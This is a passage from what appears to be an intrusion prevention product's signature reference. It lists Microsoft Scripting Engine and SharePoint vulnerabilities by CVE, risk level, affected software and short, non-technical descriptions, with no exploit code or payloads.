Situation: File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1004
References:
CVE-2019-1004
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1004
Back to top

Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1062

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1175-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: An attempt to exploit a vulnerability in Microsoft Windows
Situation: File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1062
References:
CVE-2019-1062
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1062
Back to top

Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1063

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1175-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: An attempt to exploit a vulnerability in Microsoft Windows
Situation: File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1063
References:
CVE-2019-1063
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1063
Back to top

Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1092

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1175-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: An attempt to exploit a vulnerability in Microsoft Windows
Situation: File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1092
References:
CVE-2019-1092
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1092
Back to top

Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1103

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1175-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: An attempt to exploit a vulnerability in Microsoft Windows
Situation: File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1103
References:
CVE-2019-1103
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1103
Back to top

Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1104

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1175-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: An attempt to exploit a vulnerability in Microsoft Windows
Situation: File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1104
References:
CVE-2019-1104
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1104
Back to top

Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1106

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1175-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: An attempt to exploit a vulnerability in Microsoft Windows
Situation: File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1106
References:
CVE-2019-1106
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1106
Back to top

Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1107

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1175-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: An attempt to exploit a vulnerability in Microsoft Windows
Situation: File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1107
References:
CVE-2019-1107
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1107
Back to top

Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2020-17052

About this vulnerability: A vulnerability in Microsoft Scripting Engine
Risk: High
First detected in: sgpkg-ips-1295-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0;Microsoft Edge
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Scripting Engine. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2020-17052
References:
CVE-2020-17052
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17052
ms20-nov
http://technet.microsoft.com/security/bulletin/ms20-nov
Back to top

Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2021-34480

About this vulnerability: A vulnerability in Microsoft Scripting Engine
Risk: High
First detected in: sgpkg-ips-1376-5242
Last changed: sgpkg-ips-1376-5242
Platform: Windows
Software: Internet Explorer; Microsoft Edge
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Scripting Engine. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2021-34480
References:
CVE-2021-34480
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34480
ms21-aug
http://technet.microsoft.com/security/bulletin/ms21-aug
Back to top

Microsoft-Scripting-Runtime-Object-Library-Use-After-Free-Vulnerability

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-555-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP SP2; Windows 2003; Windows Vista; Windows 2008; Windows 7; Windows 2008 R2; Windows 8; Windows 2012; Windows RT
Software: <os>
Type: Malfunction
Description: A use-after-free vulnerability exists in the Microsoft Scripting Runtime Object Library. The vulnerability is due to an object handling error that leads to memory corruption condition. A remote, unauthenticated attacker can exploit this vulnerability by enticing an unsuspecting user to access a maliciously crafted website. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.
Situation: File-Text_Microsoft-Scripting-Runtime-Object-Library-Use-After-Free-Vulnerability
References:
CVE-2013-5056
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5056
BID-64082
http://www.securityfocus.com/bid/64082
OSVDB-100766
http://www.osvdb.org/100766
MS13-099
http://technet.microsoft.com/security/bulletin/MS13-099
Back to top

Microsoft-Sharepoint-Accessserviceslisteventreceiver-Insecure-Deserialization

About this vulnerability: A vulnerability in Microsoft Office SharePoint Server
Risk: Moderate
First detected in: sgpkg-ips-1823-5242
Last changed: sgpkg-ips-1823-5242
Platform: Windows
Software: Microsoft Office SharePoint Server
Type: Input Validation
Description: Improper input validation of the workflow rules file generated based on an Access data macro of an uploaded Access template file causes an insecure deserialization vulnerability in Microsoft Sharepoint. A successful exploitation may result in an attacker being able to execute code on the target system.
Situation: HTTP_CRL-Microsoft-Sharepoint-Macro-Workflow-Insecure-Deserialization
References:
CVE-2024-43464
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43464
Back to top

Microsoft-Sharepoint-Authentication-Bypass-CVE-2023-29357

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Sharepoint detected
Risk: High
First detected in: sgpkg-ips-1600-5242
Last changed: sgpkg-ips-1600-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Input Validation
Description: An authentication issue has been identified in Sharepoint. This vulnerability can be exploited to achieve pre-authentication remote code execution.
Situation: HTTP_CSU-Microsoft-Sharepoint-Authentication-Bypass-CVE-2023-29357
HTTP_CSH-Microsoft-Sharepoint-Authentication-Bypass-CVE-2023-29357
References:
CVE-2023-29357
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29357
ms23-jun
http://technet.microsoft.com/security/bulletin/ms23-jun
Back to top

Microsoft-Sharepoint-Basexmldatasource-XML-External-Entity-Injection

About this vulnerability: A vulnerability in Microsoft Sharepoint Server
Risk: High
First detected in: sgpkg-ips-1751-5242
Last changed: sgpkg-ips-1751-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Input Validation
Description: An XML External Entity Injection vulnerability has been reported in Microsoft SharePoint Server. This vulnerability is due to insufficient input validation of XML documents retrieved from provided URLs. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in the disclosure of information in the security context of the server process.
Situation: HTTP_CS-Microsoft-Sharepoint-Basexmldatasource-XML-External-Entity-Injection
References:
CVE-2024-30043
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-30043
ms24-may
http://technet.microsoft.com/security/bulletin/ms24-may
Back to top

Microsoft-Sharepoint-Calendar-Cross-Site-Scripting

About this vulnerability: A vulnerability in Microsoft Office SharePoint
Risk: Moderate
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office SharePoint Server
Type: Input Validation
Description: A cross-site scripting vulnerability has been reported in Microsoft SharePoint. The vulnerability is due to insufficient sanitation of the request URL string by the SharePoint server. By enticing a user to open a maliciously crafted URL containing Java Script code, an attacker can cause SharePoint commands to be executed within the security context of the target user. A successful attack could lead to privilege escalation or information disclosure.
Situation: HTTP_CRL-Microsoft-Sharepoint-Calendar-Cross-Site-Scripting
References:
CVE-2011-0653
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0653
BID-49002
http://www.securityfocus.com/bid/49002
OSVDB-75389
http://www.osvdb.org/75389
MS11-074
http://technet.microsoft.com/security/bulletin/MS11-074
Back to top

Microsoft-Sharepoint-Cross-Site-Scripting-Vulnerability-CVE-2015-1640

About this vulnerability: A vulnerability in Microsoft Office SharePoint
Risk: High
First detected in: sgpkg-ips-638-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Cross-site Scripting
Description: There is a cross-site scripting (XSS) vulnerability in Microsoft SharePoint.
Situation: HTTP_CRL-Microsoft-Sharepoint-XSS-CVE-2015-1640
References:
CVE-2015-1640
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1640
MS15-036
http://technet.microsoft.com/security/bulletin/MS15-036
Back to top

Microsoft-SharePoint-CVE-2019-1443-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft SharePoint
Risk: High
First detected in: sgpkg-ips-1218-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Input Validation
Description: There exists a vulnerability in multiple versions of Microsoft Sharepoint which allows remote attackers to disclose NTLM hashes by uploading a maliciously crafted file to the target Sharepoint server, due to insufficient validation of uploaded files.
Situation: HTTP_CS-Microsoft-SharePoint-CVE-2019-1443-Information-Disclosure
References:
CVE-2019-1443
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1443
Back to top

Microsoft-Sharepoint-Denial-Of-Service-Vulnerability

About this vulnerability: A vulnerability in Sharepoint
Risk: Moderate
First detected in: sgpkg-ips-542-5211
Last changed: sgpkg-ips-1636-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Malfunction
Description: A DoS vulnerability in SharePoint
References:
CVE-2013-0081
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0081
MS13-067
http://technet.microsoft.com/security/bulletin/MS13-067
Back to top

Microsoft-SharePoint-Directory-Traversal-Vulnerability

About this vulnerability: A vulnerability in Microsoft SharePoint
Risk: High
First detected in: sgpkg-ips-515-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office SharePoint Server; Microsoft SharePoint Foundation
Type: Input Validation
Description: There is a vulnerability in Microsoft SharePoint.
Situation: HTTP_CSU-Microsoft-SharePoint-Directory-Traversal-Vulnerability
References:
CVE-2013-0084
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0084
MS13-024
http://technet.microsoft.com/security/bulletin/MS13-024
Back to top

Microsoft-Sharepoint-Editform-Script-Injection-Vulnerability

About this vulnerability: A vulnerability in Microsoft Office SharePoint Server
Risk: Moderate
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office SharePoint Server
Type: Malfunction
Description: A vulnerability in Microsoft Office SharePoint Server
Situation: HTTP_CRL-Microsoft-Sharepoint-Editform-Script-Injection-Vulnerability
References:
CVE-2011-1890
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1890
MS11-074
http://technet.microsoft.com/security/bulletin/MS11-074
Back to top

Microsoft-Sharepoint-Malformed-Request-Code-Execution-CVE-2010-3964

About this vulnerability: A vulnerability in Microsoft Sharepoint
Risk: High
First detected in: sgpkg-ips-363-4219
Last changed: sgpkg-ips-1589-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Malfunction
Description: There is a vulnerability in Microsoft Sharepoint.
Situation: HTTP_CS-Microsoft-Sharepoint-Malformed-Request-Code-Execution-CVE-2010-3964
References:
CVE-2010-3964
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3964
BID-45264
http://www.securityfocus.com/bid/45264
OSVDB-69817
http://www.osvdb.org/69817
MS10-104
http://technet.microsoft.com/security/bulletin/MS10-104
Back to top

Microsoft-SharePoint-Reflected-List-Parameter-CVE-2012-1863

About this vulnerability: A vulnerability in Microsoft SharePoint
Risk: High
First detected in: sgpkg-ips-462-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office SharePoint Server 2007; Microsoft SharePoint Services; Microsoft SharePoint Foundation
Type: Cross-site Scripting
Description: There is a vulnerability in Microsoft SharePoint.
Situation: HTTP_CSU-Microsoft-SharePoint-Reflected-List-Parameter-CVE-2012-1863
References:
CVE-2012-1863
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1863
MS12-050
http://technet.microsoft.com/security/bulletin/MS12-050
Back to top

Microsoft-SharePoint-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft SharePoint
Risk: High
First detected in: sgpkg-ips-1151-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Input Validation
Description: A vulnerability in Microsoft Sharepoint which allows remote attackers to execute remote code due to insufficient sanitization of form parameters.
Situation: HTTP_CSU-Microsoft-SharePoint-Remote-Code-Execution
References:
CVE-2019-0604
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0604
Back to top

Microsoft-SharePoint-Remote-Code-Execution-CVE-2020-17061

About this vulnerability: A vulnerability in Microsoft SharePoint Server
Risk: High
First detected in: sgpkg-ips-1295-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Input Validation
Description: There exists a remote code execution vulnerability in Microsoft Sharepoint Server due to insufficient user input validation. A successful exploitation of this vulnerability may allow an authenticated attacker to execute arbitrary .Net code on the server.
Situation: File-TextId_Microsoft-SharePoint-Remote-Code-Execution-CVE-2020-17061
References:
CVE-2020-17061
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17061
ms20-nov
http://technet.microsoft.com/security/bulletin/ms20-nov
Back to top

Microsoft-Sharepoint-Remote-Code-Execution-CVE-2025-29793

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Office SharePoint Server detected
Risk: High
First detected in: sgpkg-ips-1864-5242
Last changed: sgpkg-ips-1864-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: Microsoft Sharepoint's remote code execution vulnerability CVE-2025-29793.
Situation: HTTP_CRL-Microsoft-Sharepoint-Macro-Workflow-Insecure-Deserialization
References:
CVE-2025-29793
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-29793
ms25-apr
http://technet.microsoft.com/security/bulletin/ms25-apr
Back to top

Microsoft-Sharepoint-Remote-Code-Execution-Vulnerability-CVE-2023-33157

About this vulnerability: A vulnerability in Microsoft Sharepoint
Risk: High
First detected in: sgpkg-ips-1609-5242
Last changed: sgpkg-ips-1609-5242
Platform: Generic
Software: Microsoft Sharepoint
Type: Malfunction
Description: A remote code execution vulnerability has been reported in Microsoft Sharepoint.
Situation: File-TextId_Microsoft-Sharepoint-Remote-Code-Execution-Vulnerability-CVE-2023-33157
References:
CVE-2023-33157
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33157
ms23-jul
http://technet.microsoft.com/security/bulletin/ms23-jul
Back to top

Microsoft-Sharepoint-Remote-File-Disclosure-Vulnerability

About this vulnerability: A vulnerability in Microsoft Office SharePoint Server
Risk: Moderate
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Malfunction
Description: A vulnerability in Microsoft SharePoint
Situation: HTTP_SS-Microsoft-Sharepoint-Remote-File-Disclosure-Vulnerability
File-Text_Microsoft-Sharepoint-Remote-File-Disclosure-Vulnerability
References:
CVE-2011-1892
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1892
MS11-074
http://technet.microsoft.com/security/bulletin/MS11-074
Back to top

Microsoft-Sharepoint-Server-Access-Control-Vulnerability

About this vulnerability: Vulnerability in Microsoft SharePoint Server's access control
Risk: Moderate
First detected in: sgpkg-ips-192-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office SharePoint Server
Type: Malfunction
Description: Microsoft SharePoint server suffers from an access control vulnerability that allows remote attackers to cause a denial of service, obtain sensitive information and create scripts that run on the vulnerable site.
Situation: HTTP_CRL-Sharepoint-Server-Access-Control-Exploit
References:
CVE-2008-4032
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4032
MS08-077
http://technet.microsoft.com/security/bulletin/MS08-077
Back to top

Microsoft-Sharepoint-Server-Business-Data-Connectivity-Unsafe-Reflection

About this vulnerability: A vulnerability in Microsoft Sharepoint Server
Risk: High
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1728-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Input Validation
Description: An unsafe reflection vulnerability has been reported in the Business Data Connectivity service of Microsoft SharePoint Server. This vulnerability is due to insufficient input validation of the parameters sent to the Create method of an Entity object of a Line-of-Business (LOB) system instance. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in the execution of code in the security context of the server process.
Situation: HTTP_CS-Microsoft-Sharepoint-Server-Business-Data-Connectivity-Unsafe-Reflection
References:
CVE-2024-21318
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21318
ms24-jan
http://technet.microsoft.com/security/bulletin/ms24-jan
Back to top

Microsoft-SharePoint-Server-ChartWebPartDataStorage-Insecure-Deserialization

About this vulnerability: A vulnerability in Microsoft SharePoint Server.
Risk: High
First detected in: sgpkg-ips-1520-5242
Last changed: sgpkg-ips-1520-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Input Validation
Description: A vulnerability in Microsoft Sharepoint Server, multiple versions, which allows remote attacker to execute arbitrary code by sending crafted traffic to the target system, due to insufficient validation of data linked to a Chart Web Part.
Situation: HTTP_CS-Microsoft-SharePoint-Server-ChartWebPartDataStorage-Insecure-Deserialization
References:
CVE-2022-30157
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30157
Back to top

Microsoft-SharePoint-Server-ExecuteBdcMethod-Unsafe-Reflection-CVE-2024-38227

About this vulnerability: A vulnerability in Microsoft Sharepoint Server
Risk: High
First detected in: sgpkg-ips-1846-5242
Last changed: sgpkg-ips-1846-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Input Validation
Description: An unsafe reflection vulnerability has been reported in the Business Data Connectivity service of Microsoft SharePoint Server. This vulnerability is due to insufficient input validation of the parameters sent to the ExecuteBdcMethod method of the IRemoteExecutionService web service. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in the execution of code in the security context of the server process.
Situation: HTTP_CS-Microsoft-SharePoint-Server-ExecuteBdcMethod-Unsafe-Reflection-CVE-2024-38227
References:
CVE-2024-38227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38227
ms24-sep
http://technet.microsoft.com/security/bulletin/ms24-sep
Back to top

Microsoft-Sharepoint-Server-Generateproxyassembly-Code-Injection-CVE-2023-24955

About this vulnerability: A vulnerability in Microsoft Sharepoint Server
Risk: High
First detected in: sgpkg-ips-1636-5242
Last changed: sgpkg-ips-1636-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Input Validation
Description: A code injection vulnerability has been reported in Microsoft SharePoint Server. This vulnerability is due to insufficient input validation of the proxy namespace of the LobSystem object provided when creating a Business Data Connectivity Metadata Store metadata object. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in the execution of code in the security context of the server process.
Situation: HTTP_CS-Microsoft-Sharepoint-Server-Generateproxyassembly-Code-Injection-CVE-2023-24955
References:
CVE-2023-24955
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24955
ms23-may
http://technet.microsoft.com/security/bulletin/ms23-may
Back to top

Microsoft-Sharepoint-Server-help.aspx-Denial-Of-Service

About this vulnerability: A vulnerability in Microsoft Windows Sharepoint Services
Risk: Moderate
First detected in: sgpkg-ips-317-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office SharePoint Server
Type: Malfunction
Description: A denial of service vulnerability exists in Microsoft Office SharePoint. The flaw is due to the way that the affected product handles maliciously crafted requests sent to the Help.aspx page. A remote attacker can exploit this vulnerability to cause a denial of service condition by sending consecutive number of requests. Successful exploitation would cause the Microsoft Office SharePoint server to become unresponsive until an administrator manually restarts the application pool, and thus causing a denial of service condition.
Situation: HTTP_CSU-Microsoft-Sharepoint-Server-help.aspx-Denial-Of-Service
References:
CVE-2010-1264
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1264
BID-40559
http://www.securityfocus.com/bid/40559
MS10-039
http://technet.microsoft.com/security/bulletin/MS10-039
Back to top

Microsoft-SharePoint-Server-RCE-CVE-2021-1707

About this vulnerability: A vulnerability in Microsoft SharePoint
Risk: Moderate
First detected in: sgpkg-ips-1312-5242
Last changed: sgpkg-ips-1312-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Input Validation
Description: A remote code execution vulnerability exists in the Microsoft SharePoint Server. A user with privileges can create a site and remotely execute code within the kernel.
Situation: File-TextId_Microsoft-SharePoint-Server-RCE-CVE-2021-1707
References:
CVE-2021-1707
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1707
ms21-jan
http://technet.microsoft.com/security/bulletin/ms21-jan
Back to top

Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2021-26420

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Sharepoint detected
Risk: High
First detected in: sgpkg-ips-1835-5242
Last changed: sgpkg-ips-1835-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Input Validation
Description: Microsoft SharePoint server remote code execution vulnerability CVE-2021-26420.
Situation: File-Text_Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2021-26420
File-TextId_Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2021-26420
References:
CVE-2021-26420
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26420
Back to top

Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2025-21400

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Sharepoint detected
Risk: High
First detected in: sgpkg-ips-1835-5242
Last changed: sgpkg-ips-1835-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Input Validation
Description: Microsoft SharePoint server remote code execution vulnerability CVE-2025-21400.
Situation: File-Text_Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2025-21400
File-TextId_Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2025-21400
References:
CVE-2025-21400
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21400
ms25-feb
http://technet.microsoft.com/security/bulletin/ms25-feb
Back to top

Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2025-29794

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Office SharePoint Server detected
Risk: High
First detected in: sgpkg-ips-1864-5242
Last changed: sgpkg-ips-1864-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Input Validation
Description: Microsoft Sharepoint server's remote code execution vulnerability CVE-2025-29794.
Situation: File-Text_Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2025-29794
File-TextId_Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2025-29794
References:
CVE-2025-29794
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-29794
ms25-apr
http://technet.microsoft.com/security/bulletin/ms25-apr
Back to top

Microsoft-Sharepoint-Server-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Microsoft SharePoint Enterprise Server
Risk: Moderate
First detected in: sgpkg-ips-1232-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Input Validation
Description: Improper sanitization of requests causes a cross-site scripting vulnerability in Microsoft Sharepoint. A successful exploit allows an attacker to inject and execute arbitratry script code in users' browsers.
Situation: HTTP_CRL-Microsoft-Sharepoint-Server-Stored-Cross-Site-Scripting
References:
CVE-2020-0693
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0693
Back to top

Microsoft-Sharepoint-Server-Subscribe-Unsafe-Reflection

About this vulnerability: A vulnerability in Microsoft Sharepoint Server
Risk: High
First detected in: sgpkg-ips-1821-5242
Last changed: sgpkg-ips-1821-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Input Validation
Description: An unsafe reflection vulnerability has been reported in the Business Data Connectivity service of Microsoft SharePoint Server. This vulnerability is due to insufficient input validation of the parameters sent to the Subscribe method of an Entity object of a Line-of-Business (LOB) system instance. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in the execution of code in the security context of the server process.
Situation: HTTP_CS-Microsoft-Sharepoint-Server-Subscribe-Unsafe-Reflection
References:
CVE-2024-38094
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38094
ms24-jul
http://technet.microsoft.com/security/bulletin/ms24-jul
Back to top

Microsoft-Sharepoint-Server-Unsafe-Deserialization-CVE-2024-30044

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Sharepoint detected
Risk: High
First detected in: sgpkg-ips-1726-5242
Last changed: sgpkg-ips-1737-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Input Validation
Description: An unsafe deserialization issue has been identified in Microsoft SharePoint server. This vulnerability can allow an authenticated user to execute arbitrary code on the server.
Situation: HTTP_CS-Microsoft-Sharepoint-Server-Unsafe-Deserialization-CVE-2024-30044
HTTP_CS-Microsoft-Sharepoint-Server-Potential-Unsafe-Deserialization
References:
CVE-2024-30044
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-30044
ms24-may
http://technet.microsoft.com/security/bulletin/ms24-may
Back to top

Microsoft-Sharepoint-Server-Unsafe-Reflection-CVE-2024-38023

About this vulnerability: A vulnerability in Microsoft Sharepoint Server
Risk: High
First detected in: sgpkg-ips-1758-5242
Last changed: sgpkg-ips-1810-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Input Validation
Description: An unsafe reflection vulnerability has been reported in the Business Data Connectivity service of Microsoft SharePoint Server. This vulnerability is due to insufficient input validation of the parameters sent to the FindFiltered method of an Entity object of a Line-of-Business (LOB) system instance. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in the execution of code in the security context of the server process.
Situation: HTTP_CS-Microsoft-Sharepoint-Server-Unsafe-Reflection-CVE-2024-38023
References:
CVE-2024-38023
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38023
ms24-jul
http://technet.microsoft.com/security/bulletin/ms24-jul
Back to top

Microsoft-Sharepoint-Server-Unsafe-Reflection-CVE-2024-38024

About this vulnerability: A vulnerability in Microsoft Sharepoint Server
Risk: High
First detected in: sgpkg-ips-1756-5242
Last changed: sgpkg-ips-1810-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Input Validation
Description: An unsafe reflection vulnerability has been reported in the Business Data Connectivity service of Microsoft SharePoint Server. This vulnerability is due to insufficient input validation of the parameters sent to the FindSpecific method of an Entity object of a Line-of-Business (LOB) system instance. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in the execution of code in the security context of the server process.
Situation: HTTP_CS-Microsoft-Sharepoint-Server-Potential-Unsafe-Deserialization
References:
CVE-2024-38024
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38024
ms24-jul
http://technet.microsoft.com/security/bulletin/ms24-jul
Back to top

Microsoft-SharePoint-Server-Web-Parts-RCE

About this vulnerability: A vulnerability in Microsoft SharePoint Server
Risk: High
First detected in: sgpkg-ips-1265-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office SharePoint Server
Type: Input Validation
Description: There exists a vulnerability Microsoft SharePoint Server, multiple versions, which allows remote attackers to execute code by sending a specially crafted Web Part, due to the insufficient validation of the "ObjectDataSource" control by the function AllowControl().
Situation: HTTP_CS-Microsoft-SharePoint-Server-Web-Parts-RCE
References:
CVE-2020-1181
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1181
Back to top

Microsoft-Sharepoint-Username-Sanitization-Cross-Site-Scripting

About this vulnerability: A vulnerability in Microsoft Office SharePoint Server
Risk: Moderate
First detected in: sgpkg-ips-463-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office SharePoint Server 2010
Type: Input Validation
